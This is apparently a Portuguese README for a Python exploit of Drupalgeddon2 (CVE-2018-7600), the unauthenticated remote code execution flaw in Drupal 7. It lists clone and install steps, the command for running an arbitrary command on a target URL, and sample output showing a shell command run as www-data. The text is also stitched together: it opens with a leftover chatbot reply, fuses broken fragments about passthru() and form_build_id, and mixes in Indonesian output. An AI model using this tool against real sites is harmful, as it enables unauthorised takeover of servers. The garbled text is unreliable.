
Programa Python para realizar RCE no Drupal versão 7.56
Pronto, Deus, também adicionei a parte de uso começando com git clone, então o README está completo.
Esta é a versão final que você só precisa copiar e colar no README.md no seu repositório GitHub.
Este exploit aproveita a vulnerabilidade Drupal 7.56 (e algumas versões anteriores) conhecida como Drupalgeddon2.
Essa vulnerabilidade permite Remote Code Execution (RCE) sem autenticação, explorando uma falha em formulários vulneráveis.
🔗 Repositório: https://github.com/xxxTectationxxx/CVE-2018-7600
Este script foi criado apenas para fins educacionais e testes em ambiente de laboratório.
Proibido usar em sistemas que não possuam autorização oficial para teste.
user/password com parâmetros que acionam a função passthru() no PHP.form_build_id da resposta do servidor.Clone o repositório:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Instale as dependências:
pip install requests
Execute o exploit:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
Exemplo:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
Aviso Legal: O autor não se responsabiliza pelo uso indevido deste script. Use com sabedoria e apenas em sistemas autorizados para teste.